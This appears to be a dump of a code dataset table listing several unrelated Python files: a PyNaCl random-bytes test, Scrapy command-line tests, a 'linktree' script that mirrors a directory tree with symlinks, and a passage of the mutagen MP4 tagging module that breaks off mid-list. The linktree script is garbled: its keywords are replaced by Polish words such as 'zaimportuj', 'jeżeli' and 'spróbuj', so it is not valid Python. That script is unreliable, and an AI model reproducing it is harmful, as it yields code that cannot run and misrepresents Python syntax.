ext
stringclasses 9
values | sha
stringlengths 40
40
| content
stringlengths 3
1.04M
|
---|---|---|
py | 1a303659262fe745e6841a0210726edee312644d | # Copyright 2013 Donald Stufft and individual contributors
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from __future__ import absolute_import, division, print_function
import nacl.utils
def test_random_bytes_produces():
assert len(nacl.utils.random(16)) == 16
def test_random_bytes_produces_different_bytes():
assert nacl.utils.random(16) != nacl.utils.random(16)
|
py | 1a30368ba432bca7020336b00c15858178716151 | import os
import sys
import subprocess
import tempfile
from time import sleep
from os.path import exists, join, abspath
from shutil import rmtree, copytree
from tempfile import mkdtemp
import six
from twisted.trial import unittest
from twisted.internet import defer
import scrapy
from scrapy.utils.python import to_native_str
from scrapy.utils.python import retry_on_eintr
from scrapy.utils.test import get_testenv
from scrapy.utils.testsite import SiteTest
from scrapy.utils.testproc import ProcessTest
class ProjectTest(unittest.TestCase):
project_name = 'testproject'
def setUp(self):
self.temp_path = mkdtemp()
self.cwd = self.temp_path
self.proj_path = join(self.temp_path, self.project_name)
self.proj_mod_path = join(self.proj_path, self.project_name)
self.env = get_testenv()
def tearDown(self):
rmtree(self.temp_path)
def call(self, *new_args, **kwargs):
with tempfile.TemporaryFile() as out:
args = (sys.executable, '-m', 'scrapy.cmdline') + new_args
return subprocess.call(args, stdout=out, stderr=out, cwd=self.cwd,
env=self.env, **kwargs)
def proc(self, *new_args, **kwargs):
args = (sys.executable, '-m', 'scrapy.cmdline') + new_args
p = subprocess.Popen(args, cwd=self.cwd, env=self.env,
stdout=subprocess.PIPE, stderr=subprocess.PIPE,
**kwargs)
waited = 0
interval = 0.2
while p.poll() is None:
sleep(interval)
waited += interval
if waited > 15:
p.kill()
assert False, 'Command took too much time to complete'
return p
class StartprojectTest(ProjectTest):
def test_startproject(self):
self.assertEqual(0, self.call('startproject', self.project_name))
assert exists(join(self.proj_path, 'scrapy.cfg'))
assert exists(join(self.proj_path, 'testproject'))
assert exists(join(self.proj_mod_path, '__init__.py'))
assert exists(join(self.proj_mod_path, 'items.py'))
assert exists(join(self.proj_mod_path, 'pipelines.py'))
assert exists(join(self.proj_mod_path, 'settings.py'))
assert exists(join(self.proj_mod_path, 'spiders', '__init__.py'))
self.assertEqual(1, self.call('startproject', self.project_name))
self.assertEqual(1, self.call('startproject', 'wrong---project---name'))
self.assertEqual(1, self.call('startproject', 'sys'))
class StartprojectTemplatesTest(ProjectTest):
def setUp(self):
super(StartprojectTemplatesTest, self).setUp()
self.tmpl = join(self.temp_path, 'templates')
self.tmpl_proj = join(self.tmpl, 'project')
def test_startproject_template_override(self):
copytree(join(scrapy.__path__[0], 'templates'), self.tmpl)
with open(join(self.tmpl_proj, 'root_template'), 'w'):
pass
assert exists(join(self.tmpl_proj, 'root_template'))
args = ['--set', 'TEMPLATES_DIR=%s' % self.tmpl]
p = self.proc('startproject', self.project_name, *args)
out = to_native_str(retry_on_eintr(p.stdout.read))
self.assertIn("New Scrapy project %r, using template directory" % self.project_name, out)
self.assertIn(self.tmpl_proj, out)
assert exists(join(self.proj_path, 'root_template'))
class CommandTest(ProjectTest):
def setUp(self):
super(CommandTest, self).setUp()
self.call('startproject', self.project_name)
self.cwd = join(self.temp_path, self.project_name)
self.env['SCRAPY_SETTINGS_MODULE'] = '%s.settings' % self.project_name
class GenspiderCommandTest(CommandTest):
def test_arguments(self):
# only pass one argument. spider script shouldn't be created
self.assertEqual(2, self.call('genspider', 'test_name'))
assert not exists(join(self.proj_mod_path, 'spiders', 'test_name.py'))
# pass two arguments <name> <domain>. spider script should be created
self.assertEqual(0, self.call('genspider', 'test_name', 'test.com'))
assert exists(join(self.proj_mod_path, 'spiders', 'test_name.py'))
def test_template(self, tplname='crawl'):
args = ['--template=%s' % tplname] if tplname else []
spname = 'test_spider'
p = self.proc('genspider', spname, 'test.com', *args)
out = to_native_str(retry_on_eintr(p.stdout.read))
self.assertIn("Created spider %r using template %r in module" % (spname, tplname), out)
self.assertTrue(exists(join(self.proj_mod_path, 'spiders', 'test_spider.py')))
p = self.proc('genspider', spname, 'test.com', *args)
out = to_native_str(retry_on_eintr(p.stdout.read))
self.assertIn("Spider %r already exists in module" % spname, out)
def test_template_basic(self):
self.test_template('basic')
def test_template_csvfeed(self):
self.test_template('csvfeed')
def test_template_xmlfeed(self):
self.test_template('xmlfeed')
def test_list(self):
self.assertEqual(0, self.call('genspider', '--list'))
def test_dump(self):
self.assertEqual(0, self.call('genspider', '--dump=basic'))
self.assertEqual(0, self.call('genspider', '-d', 'basic'))
def test_same_name_as_project(self):
self.assertEqual(2, self.call('genspider', self.project_name))
assert not exists(join(self.proj_mod_path, 'spiders', '%s.py' % self.project_name))
class MiscCommandsTest(CommandTest):
def test_list(self):
self.assertEqual(0, self.call('list'))
class RunSpiderCommandTest(CommandTest):
def test_runspider(self):
tmpdir = self.mktemp()
os.mkdir(tmpdir)
fname = abspath(join(tmpdir, 'myspider.py'))
with open(fname, 'w') as f:
f.write("""
import scrapy
class MySpider(scrapy.Spider):
name = 'myspider'
def start_requests(self):
self.logger.debug("It Works!")
return []
""")
p = self.proc('runspider', fname)
log = to_native_str(p.stderr.read())
self.assertIn("DEBUG: It Works!", log)
self.assertIn("INFO: Spider opened", log)
self.assertIn("INFO: Closing spider (finished)", log)
self.assertIn("INFO: Spider closed (finished)", log)
def test_runspider_no_spider_found(self):
tmpdir = self.mktemp()
os.mkdir(tmpdir)
fname = abspath(join(tmpdir, 'myspider.py'))
with open(fname, 'w') as f:
f.write("""
from scrapy.spiders import Spider
""")
p = self.proc('runspider', fname)
log = to_native_str(p.stderr.read())
self.assertIn("No spider found in file", log)
def test_runspider_file_not_found(self):
p = self.proc('runspider', 'some_non_existent_file')
log = to_native_str(p.stderr.read())
self.assertIn("File not found: some_non_existent_file", log)
def test_runspider_unable_to_load(self):
tmpdir = self.mktemp()
os.mkdir(tmpdir)
fname = abspath(join(tmpdir, 'myspider.txt'))
with open(fname, 'w') as f:
f.write("")
p = self.proc('runspider', fname)
log = to_native_str(p.stderr.read())
self.assertIn("Unable to load", log)
class ParseCommandTest(ProcessTest, SiteTest, CommandTest):
command = 'parse'
def setUp(self):
super(ParseCommandTest, self).setUp()
self.spider_name = 'parse_spider'
fname = abspath(join(self.proj_mod_path, 'spiders', 'myspider.py'))
with open(fname, 'w') as f:
f.write("""
import scrapy
class MySpider(scrapy.Spider):
name = '{0}'
def parse(self, response):
if getattr(self, 'test_arg', None):
self.logger.debug('It Works!')
return [scrapy.Item(), dict(foo='bar')]
""".format(self.spider_name))
fname = abspath(join(self.proj_mod_path, 'pipelines.py'))
with open(fname, 'w') as f:
f.write("""
import logging
class MyPipeline(object):
component_name = 'my_pipeline'
def process_item(self, item, spider):
logging.info('It Works!')
return item
""")
fname = abspath(join(self.proj_mod_path, 'settings.py'))
with open(fname, 'a') as f:
f.write("""
ITEM_PIPELINES = {'%s.pipelines.MyPipeline': 1}
""" % self.project_name)
@defer.inlineCallbacks
def test_spider_arguments(self):
_, _, stderr = yield self.execute(['--spider', self.spider_name,
'-a', 'test_arg=1',
'-c', 'parse',
self.url('/html')])
self.assertIn("DEBUG: It Works!", to_native_str(stderr))
@defer.inlineCallbacks
def test_pipelines(self):
_, _, stderr = yield self.execute(['--spider', self.spider_name,
'--pipelines',
'-c', 'parse',
self.url('/html')])
self.assertIn("INFO: It Works!", to_native_str(stderr))
@defer.inlineCallbacks
def test_parse_items(self):
status, out, stderr = yield self.execute(
['--spider', self.spider_name, '-c', 'parse', self.url('/html')]
)
self.assertIn("""[{}, {'foo': 'bar'}]""", to_native_str(out))
class BenchCommandTest(CommandTest):
def test_run(self):
p = self.proc('bench', '-s', 'LOGSTATS_INTERVAL=0.001',
'-s', 'CLOSESPIDER_TIMEOUT=0.01')
log = to_native_str(p.stderr.read())
self.assertIn('INFO: Crawled', log)
self.assertNotIn('Unhandled Error', log)
|
py | 1a3036958a98967887dd32d7ac1c61f266b30daa | #! /usr/bin/env python3
# linktree
#
# Make a copy of a directory tree przy symbolic links to all files w the
# original tree.
# All symbolic links go to a special symbolic link at the top, so you
# can easily fix things jeżeli the original source tree moves.
# See also "mkreal".
#
# usage: mklinks oldtree newtree
zaimportuj sys, os
LINK = '.LINK' # Name of special symlink at the top.
debug = 0
def main():
jeżeli nie 3 <= len(sys.argv) <= 4:
print('usage:', sys.argv[0], 'oldtree newtree [linkto]')
zwróć 2
oldtree, newtree = sys.argv[1], sys.argv[2]
jeżeli len(sys.argv) > 3:
link = sys.argv[3]
link_may_fail = 1
inaczej:
link = LINK
link_may_fail = 0
jeżeli nie os.path.isdir(oldtree):
print(oldtree + ': nie a directory')
zwróć 1
spróbuj:
os.mkdir(newtree, 0o777)
wyjąwszy OSError jako msg:
print(newtree + ': cannot mkdir:', msg)
zwróć 1
linkname = os.path.join(newtree, link)
spróbuj:
os.symlink(os.path.join(os.pardir, oldtree), linkname)
wyjąwszy OSError jako msg:
jeżeli nie link_may_fail:
print(linkname + ': cannot symlink:', msg)
zwróć 1
inaczej:
print(linkname + ': warning: cannot symlink:', msg)
linknames(oldtree, newtree, link)
zwróć 0
def linknames(old, new, link):
jeżeli debug: print('linknames', (old, new, link))
spróbuj:
names = os.listdir(old)
wyjąwszy OSError jako msg:
print(old + ': warning: cannot listdir:', msg)
zwróć
dla name w names:
jeżeli name nie w (os.curdir, os.pardir):
oldname = os.path.join(old, name)
linkname = os.path.join(link, name)
newname = os.path.join(new, name)
jeżeli debug > 1: print(oldname, newname, linkname)
jeżeli os.path.isdir(oldname) oraz \
nie os.path.islink(oldname):
spróbuj:
os.mkdir(newname, 0o777)
ok = 1
wyjąwszy:
print(newname + \
': warning: cannot mkdir:', msg)
ok = 0
jeżeli ok:
linkname = os.path.join(os.pardir,
linkname)
linknames(oldname, newname, linkname)
inaczej:
os.symlink(linkname, newname)
jeżeli __name__ == '__main__':
sys.exit(main())
|
py | 1a30372249f51bead4c5c0d4d412fe2f179192bb | # -*- coding: utf-8 -*-
# Copyright (C) 2006 Joe Wreschnig
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License version 2 as
# published by the Free Software Foundation.
"""Read and write MPEG-4 audio files with iTunes metadata.
This module will read MPEG-4 audio information and metadata,
as found in Apple's MP4 (aka M4A, M4B, M4P) files.
There is no official specification for this format. The source code
for TagLib, FAAD, and various MPEG specifications at
* http://developer.apple.com/documentation/QuickTime/QTFF/
* http://www.geocities.com/xhelmboyx/quicktime/formats/mp4-layout.txt
* http://standards.iso.org/ittf/PubliclyAvailableStandards/\
c041828_ISO_IEC_14496-12_2005(E).zip
* http://wiki.multimedia.cx/index.php?title=Apple_QuickTime
were all consulted.
"""
import struct
import sys
from mutagen import FileType, Metadata, StreamInfo
from mutagen._constants import GENRES
from mutagen._util import (cdata, insert_bytes, DictProxy, MutagenError,
hashable, enum)
from mutagen._compat import (reraise, PY2, string_types, text_type, chr_,
iteritems, PY3, cBytesIO)
from ._atom import Atoms, Atom, AtomError
from ._util import parse_full_atom
from ._as_entry import AudioSampleEntry, ASEntryError
class error(IOError, MutagenError):
pass
class MP4MetadataError(error):
pass
class MP4StreamInfoError(error):
pass
class MP4MetadataValueError(ValueError, MP4MetadataError):
pass
__all__ = ['MP4', 'Open', 'delete', 'MP4Cover', 'MP4FreeForm', 'AtomDataType','MediaKind', 'HDVideo', 'ContentRating']
@enum
class AtomDataType(object):
"""Enum for `dataformat` attribute of MP4FreeForm.
.. versionadded:: 1.25
"""
IMPLICIT = 0
"""for use with tags for which no type needs to be indicated because
only one type is allowed"""
UTF8 = 1
"""without any count or null terminator"""
UTF16 = 2
"""also known as UTF-16BE"""
SJIS = 3
"""deprecated unless it is needed for special Japanese characters"""
HTML = 6
"""the HTML file header specifies which HTML version"""
XML = 7
"""the XML header must identify the DTD or schemas"""
UUID = 8
"""also known as GUID; stored as 16 bytes in binary (valid as an ID)"""
ISRC = 9
"""stored as UTF-8 text (valid as an ID)"""
MI3P = 10
"""stored as UTF-8 text (valid as an ID)"""
GIF = 12
"""(deprecated) a GIF image"""
JPEG = 13
"""a JPEG image"""
PNG = 14
"""PNG image"""
URL = 15
"""absolute, in UTF-8 characters"""
DURATION = 16
"""in milliseconds, 32-bit integer"""
DATETIME = 17
"""in UTC, counting seconds since midnight, January 1, 1904;
32 or 64-bits"""
GENRES = 18
"""a list of enumerated values"""
INTEGER = 21
"""a signed big-endian integer with length one of { 1,2,3,4,8 } bytes"""
RIAA_PA = 24
"""RIAA parental advisory; { -1=no, 1=yes, 0=unspecified },
8-bit ingteger"""
UPC = 25
"""Universal Product Code, in text UTF-8 format (valid as an ID)"""
BMP = 27
"""Windows bitmap image"""
@hashable
class MP4Cover(bytes):
"""A cover artwork.
Attributes:
* imageformat -- format of the image (either FORMAT_JPEG or FORMAT_PNG)
"""
FORMAT_JPEG = AtomDataType.JPEG
FORMAT_PNG = AtomDataType.PNG
def __new__(cls, data, *args, **kwargs):
return bytes.__new__(cls, data)
def __init__(self, data, imageformat=FORMAT_JPEG):
self.imageformat = imageformat
__hash__ = bytes.__hash__
def __eq__(self, other):
if not isinstance(other, MP4Cover):
return NotImplemented
if not bytes.__eq__(self, other):
return False
if self.imageformat != other.imageformat:
return False
return True
def __ne__(self, other):
return not self.__eq__(other)
def __repr__(self):
return "%s(%r, %r)" % (
type(self).__name__, bytes(self),
AtomDataType(self.imageformat))
@hashable
class MP4FreeForm(bytes):
"""A freeform value.
Attributes:
* dataformat -- format of the data (see AtomDataType)
"""
FORMAT_DATA = AtomDataType.IMPLICIT # deprecated
FORMAT_TEXT = AtomDataType.UTF8 # deprecated
def __new__(cls, data, *args, **kwargs):
return bytes.__new__(cls, data)
def __init__(self, data, dataformat=AtomDataType.UTF8, version=0):
self.dataformat = dataformat
self.version = version
__hash__ = bytes.__hash__
def __eq__(self, other):
if not isinstance(other, MP4FreeForm):
return NotImplemented
if not bytes.__eq__(self, other):
return False
if self.dataformat != other.dataformat:
return False
if self.version != other.version:
return False
return True
def __ne__(self, other):
return not self.__eq__(other)
def __repr__(self):
return "%s(%r, %r)" % (
type(self).__name__, bytes(self),
AtomDataType(self.dataformat))
def _name2key(name):
if PY2:
return name
return name.decode("latin-1")
def _key2name(key):
if PY2:
return key
return key.encode("latin-1")
class MP4Tags(DictProxy, Metadata):
r"""Dictionary containing Apple iTunes metadata list key/values.
Keys are four byte identifiers, except for freeform ('----')
keys. Values are usually unicode strings, but some atoms have a
special structure:
Text values (multiple values per key are supported):
* '\\xa9nam' -- track title
* '\\xa9alb' -- album
* '\\xa9ART' -- artist
* 'aART' -- album artist
* '\\xa9wrt' -- composer
* '\\xa9day' -- year
* '\\xa9cmt' -- comment
* 'desc' -- description (usually used in podcasts)
* 'purd' -- purchase date
* '\\xa9grp' -- grouping
* '\\xa9gen' -- genre
* '\\xa9lyr' -- lyrics
* 'purl' -- podcast URL
* 'egid' -- podcast episode GUID
* 'catg' -- podcast category
* 'keyw' -- podcast keywords
* '\\xa9too' -- encoded by
* 'cprt' -- copyright
* 'soal' -- album sort order
* 'soaa' -- album artist sort order
* 'soar' -- artist sort order
* 'sonm' -- title sort order
* 'soco' -- composer sort order
* 'sosn' -- show sort order
* 'tvsh' -- show name
Boolean values:
* 'cpil' -- part of a compilation
* 'pgap' -- part of a gapless album
* 'pcst' -- podcast (iTunes reads this only on import)
Tuples of ints (multiple values per key are supported):
* 'trkn' -- track number, total tracks
* 'disk' -- disc number, total discs
Others:
* 'tmpo' -- tempo/BPM, 16 bit int
* 'covr' -- cover artwork, list of MP4Cover objects (which are
tagged strs)
* 'gnre' -- ID3v1 genre. Not supported, use '\\xa9gen' instead.
The freeform '----' frames use a key in the format '----:mean:name'
where 'mean' is usually 'com.apple.iTunes' and 'name' is a unique
identifier for this frame. The value is a str, but is probably
text that can be decoded as UTF-8. Multiple values per key are
supported.
MP4 tag data cannot exist outside of the structure of an MP4 file,
so this class should not be manually instantiated.
Unknown non-text tags and tags that failed to parse will be written
back as is.
"""
def __init__(self, *args, **kwargs):
self._failed_atoms = {}
super(MP4Tags, self).__init__(*args, **kwargs)
def load(self, atoms, fileobj):
try:
ilst = atoms[b"moov.udta.meta.ilst"]
except KeyError as key:
raise MP4MetadataError(key)
for atom in ilst.children:
ok, data = atom.read(fileobj)
if not ok:
raise MP4MetadataError("Not enough data")
try:
if atom.name in self.__atoms:
info = self.__atoms[atom.name]
info[0](self, atom, data)
else:
# unknown atom, try as text
self.__parse_text(atom, data, implicit=False)
except MP4MetadataError:
# parsing failed, save them so we can write them back
key = _name2key(atom.name)
self._failed_atoms.setdefault(key, []).append(data)
def __setitem__(self, key, value):
if not isinstance(key, str):
raise TypeError("key has to be str")
super(MP4Tags, self).__setitem__(key, value)
@classmethod
def _can_load(cls, atoms):
return b"moov.udta.meta.ilst" in atoms
@staticmethod
def _key_sort(item):
(key, v) = item
# iTunes always writes the tags in order of "relevance", try
# to copy it as closely as possible.
order = ["\xa9nam", "\xa9ART", "\xa9wrt", "\xa9alb",
"\xa9gen", "gnre", "trkn", "disk",
"\xa9day", "cpil", "pgap", "pcst", "tmpo",
"\xa9too", "----", "covr", "\xa9lyr", "stik",
"tvsh", "tven", "tvsn", "tves", "tvnn"]
order = dict(zip(order, range(len(order))))
last = len(order)
# If there's no key-based way to distinguish, order by length.
# If there's still no way, go by string comparison on the
# values, so we at least have something determinstic.
return (order.get(key[:4], last), len(repr(v)), repr(v))
def save(self, filename):
"""Save the metadata to the given filename."""
values = []
items = sorted(self.items(), key=self._key_sort)
for key, value in items:
atom_name = _key2name(key)[:4]
if atom_name in self.__atoms:
render_func = self.__atoms[atom_name][1]
else:
render_func = type(self).__render_text
try:
if value:
values.append(render_func(self, key, value))
except (TypeError, ValueError) as s:
reraise(MP4MetadataValueError, s, sys.exc_info()[2])
for key, failed in iteritems(self._failed_atoms):
# don't write atoms back if we have added a new one with
# the same name, this excludes freeform which can have
# multiple atoms with the same key (most parsers seem to be able
# to handle that)
if key in self:
assert _key2name(key) != b"----"
continue
for data in failed:
values.append(Atom.render(_key2name(key), data))
data = Atom.render(b"ilst", b"".join(values))
# Find the old atoms.
with open(filename, "rb+") as fileobj:
try:
atoms = Atoms(fileobj)
except AtomError as err:
reraise(error, err, sys.exc_info()[2])
try:
path = atoms.path(b"moov", b"udta", b"meta", b"ilst")
except KeyError:
self.__save_new(fileobj, atoms, data)
else:
self.__save_existing(fileobj, atoms, path, data)
def __pad_ilst(self, data, length=None):
if length is None:
length = ((len(data) + 1023) & ~1023) - len(data)
return Atom.render(b"free", b"\x00" * length)
def __save_new(self, fileobj, atoms, ilst):
hdlr = Atom.render(b"hdlr", b"\x00" * 8 + b"mdirappl" + b"\x00" * 9)
meta = Atom.render(
b"meta", b"\x00\x00\x00\x00" + hdlr + ilst + self.__pad_ilst(ilst))
try:
path = atoms.path(b"moov", b"udta")
except KeyError:
# moov.udta not found -- create one
path = atoms.path(b"moov")
meta = Atom.render(b"udta", meta)
offset = path[-1].offset + 8
insert_bytes(fileobj, len(meta), offset)
fileobj.seek(offset)
fileobj.write(meta)
self.__update_parents(fileobj, path, len(meta))
self.__update_offsets(fileobj, atoms, len(meta), offset)
def __save_existing(self, fileobj, atoms, path, data):
# Replace the old ilst atom.
ilst = path.pop()
offset = ilst.offset
length = ilst.length
# Check for padding "free" atoms
meta = path[-1]
index = meta.children.index(ilst)
try:
prev = meta.children[index - 1]
if prev.name == b"free":
offset = prev.offset
length += prev.length
except IndexError:
pass
try:
next = meta.children[index + 1]
if next.name == b"free":
length += next.length
except IndexError:
pass
delta = len(data) - length
if delta > 0 or (delta < 0 and delta > -8):
data += self.__pad_ilst(data)
delta = len(data) - length
insert_bytes(fileobj, delta, offset)
elif delta < 0:
data += self.__pad_ilst(data, -delta - 8)
delta = 0
fileobj.seek(offset)
fileobj.write(data)
self.__update_parents(fileobj, path, delta)
self.__update_offsets(fileobj, atoms, delta, offset)
def __update_parents(self, fileobj, path, delta):
"""Update all parent atoms with the new size."""
for atom in path:
fileobj.seek(atom.offset)
size = cdata.uint_be(fileobj.read(4))
if size == 1: # 64bit
# skip name (4B) and read size (8B)
size = cdata.ulonglong_be(fileobj.read(12)[4:])
fileobj.seek(atom.offset + 8)
fileobj.write(cdata.to_ulonglong_be(size + delta))
else: # 32bit
fileobj.seek(atom.offset)
fileobj.write(cdata.to_uint_be(size + delta))
def __update_offset_table(self, fileobj, fmt, atom, delta, offset):
"""Update offset table in the specified atom."""
if atom.offset > offset:
atom.offset += delta
fileobj.seek(atom.offset + 12)
data = fileobj.read(atom.length - 12)
fmt = fmt % cdata.uint_be(data[:4])
offsets = struct.unpack(fmt, data[4:])
offsets = [o + (0, delta)[offset < o] for o in offsets]
fileobj.seek(atom.offset + 16)
fileobj.write(struct.pack(fmt, *offsets))
def __update_tfhd(self, fileobj, atom, delta, offset):
if atom.offset > offset:
atom.offset += delta
fileobj.seek(atom.offset + 9)
data = fileobj.read(atom.length - 9)
flags = cdata.uint_be(b"\x00" + data[:3])
if flags & 1:
o = cdata.ulonglong_be(data[7:15])
if o > offset:
o += delta
fileobj.seek(atom.offset + 16)
fileobj.write(cdata.to_ulonglong_be(o))
def __update_offsets(self, fileobj, atoms, delta, offset):
"""Update offset tables in all 'stco' and 'co64' atoms."""
if delta == 0:
return
moov = atoms[b"moov"]
for atom in moov.findall(b'stco', True):
self.__update_offset_table(fileobj, ">%dI", atom, delta, offset)
for atom in moov.findall(b'co64', True):
self.__update_offset_table(fileobj, ">%dQ", atom, delta, offset)
try:
for atom in atoms[b"moof"].findall(b'tfhd', True):
self.__update_tfhd(fileobj, atom, delta, offset)
except KeyError:
pass
def __parse_data(self, atom, data):
pos = 0
while pos < atom.length - 8:
head = data[pos:pos + 12]
if len(head) != 12:
raise MP4MetadataError("truncated atom % r" % atom.name)
length, name = struct.unpack(">I4s", head[:8])
version = ord(head[8:9])
flags = struct.unpack(">I", b"\x00" + head[9:12])[0]
if name != b"data":
raise MP4MetadataError(
"unexpected atom %r inside %r" % (name, atom.name))
chunk = data[pos + 16:pos + length]
if len(chunk) != length - 16:
raise MP4MetadataError("truncated atom % r" % atom.name)
yield version, flags, chunk
pos += length
def __add(self, key, value, single=False):
assert isinstance(key, str)
if single:
self[key] = value
else:
self.setdefault(key, []).extend(value)
def __render_data(self, key, version, flags, value):
return Atom.render(_key2name(key), b"".join([
Atom.render(
b"data", struct.pack(">2I", version << 24 | flags, 0) + data)
for data in value]))
def __parse_freeform(self, atom, data):
length = cdata.uint_be(data[:4])
mean = data[12:length]
pos = length
length = cdata.uint_be(data[pos:pos + 4])
name = data[pos + 12:pos + length]
pos += length
value = []
while pos < atom.length - 8:
length, atom_name = struct.unpack(">I4s", data[pos:pos + 8])
if atom_name != b"data":
raise MP4MetadataError(
"unexpected atom %r inside %r" % (atom_name, atom.name))
version = ord(data[pos + 8:pos + 8 + 1])
flags = struct.unpack(">I", b"\x00" + data[pos + 9:pos + 12])[0]
value.append(MP4FreeForm(data[pos + 16:pos + length],
dataformat=flags, version=version))
pos += length
key = _name2key(atom.name + b":" + mean + b":" + name)
self.__add(key, value)
def __render_freeform(self, key, value):
if isinstance(value, bytes):
value = [value]
dummy, mean, name = _key2name(key).split(b":", 2)
mean = struct.pack(">I4sI", len(mean) + 12, b"mean", 0) + mean
name = struct.pack(">I4sI", len(name) + 12, b"name", 0) + name
data = b""
for v in value:
flags = AtomDataType.UTF8
version = 0
if isinstance(v, MP4FreeForm):
flags = v.dataformat
version = v.version
data += struct.pack(
">I4s2I", len(v) + 16, b"data", version << 24 | flags, 0)
data += v.encode('UTF-8')
return Atom.render(b"----", mean + name + data)
def __parse_pair(self, atom, data):
key = _name2key(atom.name)
values = [struct.unpack(">2H", d[2:6]) for
version, flags, d in self.__parse_data(atom, data)]
self.__add(key, values)
def __render_pair(self, key, value):
data = []
for (track, total) in value:
if 0 <= track < 1 << 16 and 0 <= total < 1 << 16:
data.append(struct.pack(">4H", 0, track, total, 0))
else:
raise MP4MetadataValueError(
"invalid numeric pair %r" % ((track, total),))
return self.__render_data(key, 0, AtomDataType.IMPLICIT, data)
def __render_pair_no_trailing(self, key, value):
data = []
for (track, total) in value:
if 0 <= track < 1 << 16 and 0 <= total < 1 << 16:
data.append(struct.pack(">3H", 0, track, total))
else:
raise MP4MetadataValueError(
"invalid numeric pair %r" % ((track, total),))
return self.__render_data(key, 0, AtomDataType.IMPLICIT, data)
def __parse_genre(self, atom, data):
values = []
for version, flags, data in self.__parse_data(atom, data):
# version = 0, flags = 0
if len(data) != 2:
raise MP4MetadataValueError("invalid genre")
genre = cdata.short_be(data)
# Translate to a freeform genre.
try:
genre = GENRES[genre - 1]
except IndexError:
# this will make us write it back at least
raise MP4MetadataValueError("unknown genre")
values.append(genre)
key = _name2key(b"\xa9gen")
self.__add(key, values)
def __parse_tempo(self, atom, data):
values = []
for version, flags, data in self.__parse_data(atom, data):
# version = 0, flags = 0 or 21
if len(data) != 2:
raise MP4MetadataValueError("invalid tempo")
values.append(cdata.ushort_be(data))
key = _name2key(atom.name)
self.__add(key, values)
def __render_tempo(self, key, value):
try:
if len(value) == 0:
return self.__render_data(key, 0, AtomDataType.INTEGER, b"")
if (min(value) < 0) or (max(value) >= 2 ** 16):
raise MP4MetadataValueError(
"invalid 16 bit integers: %r" % value)
except TypeError:
raise MP4MetadataValueError(
"tmpo must be a list of 16 bit integers")
values = [cdata.to_ushort_be(v) for v in value]
return self.__render_data(key, 0, AtomDataType.INTEGER, values)
def __parse_bool(self, atom, data):
for version, flags, data in self.__parse_data(atom, data):
if len(data) != 1:
raise MP4MetadataValueError("invalid bool")
value = bool(ord(data))
key = _name2key(atom.name)
self.__add(key, value, single=True)
def __render_bool(self, key, value):
return self.__render_data(
key, 0, AtomDataType.INTEGER, [chr_(bool(value))])
def __parse_cover(self, atom, data):
values = []
pos = 0
while pos < atom.length - 8:
length, name, imageformat = struct.unpack(">I4sI",
data[pos:pos + 12])
if name != b"data":
if name == b"name":
pos += length
continue
raise MP4MetadataError(
"unexpected atom %r inside 'covr'" % name)
if imageformat not in (MP4Cover.FORMAT_JPEG, MP4Cover.FORMAT_PNG):
# Sometimes AtomDataType.IMPLICIT or simply wrong.
# In all cases it was jpeg, so default to it
imageformat = MP4Cover.FORMAT_JPEG
cover = MP4Cover(data[pos + 16:pos + length], imageformat)
values.append(cover)
pos += length
key = _name2key(atom.name)
self.__add(key, values)
def __render_cover(self, key, value):
atom_data = []
for cover in value:
try:
imageformat = cover.imageformat
except AttributeError:
imageformat = MP4Cover.FORMAT_JPEG
atom_data.append(Atom.render(
b"data", struct.pack(">2I", imageformat, 0) + cover))
return Atom.render(_key2name(key), b"".join(atom_data))
def __parse_text(self, atom, data, implicit=True):
# implicit = False, for parsing unknown atoms only take utf8 ones.
# For known ones we can assume the implicit are utf8 too.
values = []
for version, flags, atom_data in self.__parse_data(atom, data):
if implicit:
if flags not in (AtomDataType.IMPLICIT, AtomDataType.UTF8):
raise MP4MetadataError(
"Unknown atom type %r for %r" % (flags, atom.name))
else:
if flags != AtomDataType.UTF8:
raise MP4MetadataError(
"%r is not text, ignore" % atom.name)
try:
text = atom_data.decode("utf-8")
except UnicodeDecodeError as e:
raise MP4MetadataError("%s: %s" % (_name2key(atom.name), e))
values.append(text)
key = _name2key(atom.name)
self.__add(key, values)
def __render_text(self, key, value, flags=AtomDataType.UTF8):
if isinstance(value, string_types):
value = [value]
encoded = []
for v in value:
if not isinstance(v, text_type):
if PY3:
raise TypeError("%r not str" % v)
v = v.decode("utf-8")
encoded.append(v.encode("utf-8"))
return self.__render_data(key, 0, flags, encoded)
def __render_8int(self, key, value):
try:
if len(value) == 0:
return self.__render_data(key, 0x07, b"")
if min(value) < 0 or max(value) >= 2 ** 8:
raise MP4MetadataValueError(
"invalid 8 bit integers: %r" % value)
except TypeError:
raise MP4MetadataValueError(
"%s must be a list of 8 bit integers" % (key))
values = list(map(cdata.to_uchar_be, value))
return self.__render_data(key, 0, 0x07, values)
def __render_32int(self, key, value):
try:
if len(value) == 0:
return self.__render_data(key, 0x31, b"")
if min(value) < 0 or max(value) >= 2 ** 32:
raise MP4MetadataValueError(
"invalid 32 bit integers: %r" % value)
except TypeError:
raise MP4MetadataValueError(
"%s must be a list of 32 bit integers" % (key))
values = list(map(cdata.to_uint_be, value))
return self.__render_data(key, 0, 0x31, values)
def delete(self, filename):
"""Remove the metadata from the given filename."""
self._failed_atoms.clear()
self.clear()
self.save(filename)
__atoms = {
b"----": (__parse_freeform, __render_freeform),
b"trkn": (__parse_pair, __render_pair),
b"disk": (__parse_pair, __render_pair_no_trailing),
b"gnre": (__parse_genre, None),
b"tmpo": (__parse_tempo, __render_tempo),
b"cpil": (__parse_bool, __render_bool),
b"pgap": (__parse_bool, __render_bool),
b"pcst": (__parse_bool, __render_bool),
b"covr": (__parse_cover, __render_cover),
b"purl": (__parse_text, __render_text),
b"egid": (__parse_text, __render_text),
b"hdvd": (__parse_text, __render_8int),
b"tves": (__parse_text, __render_32int),
b"tvsn": (__parse_text, __render_32int),
b"stik": (__parse_text, __render_8int),
b"rtng": (__parse_text, __render_8int),
}
# these allow implicit flags and parse as text
for name in [b"\xa9nam", b"\xa9alb", b"\xa9ART", b"aART", b"\xa9wrt",
b"\xa9day", b"\xa9cmt", b"desc", b"purd", b"\xa9grp",
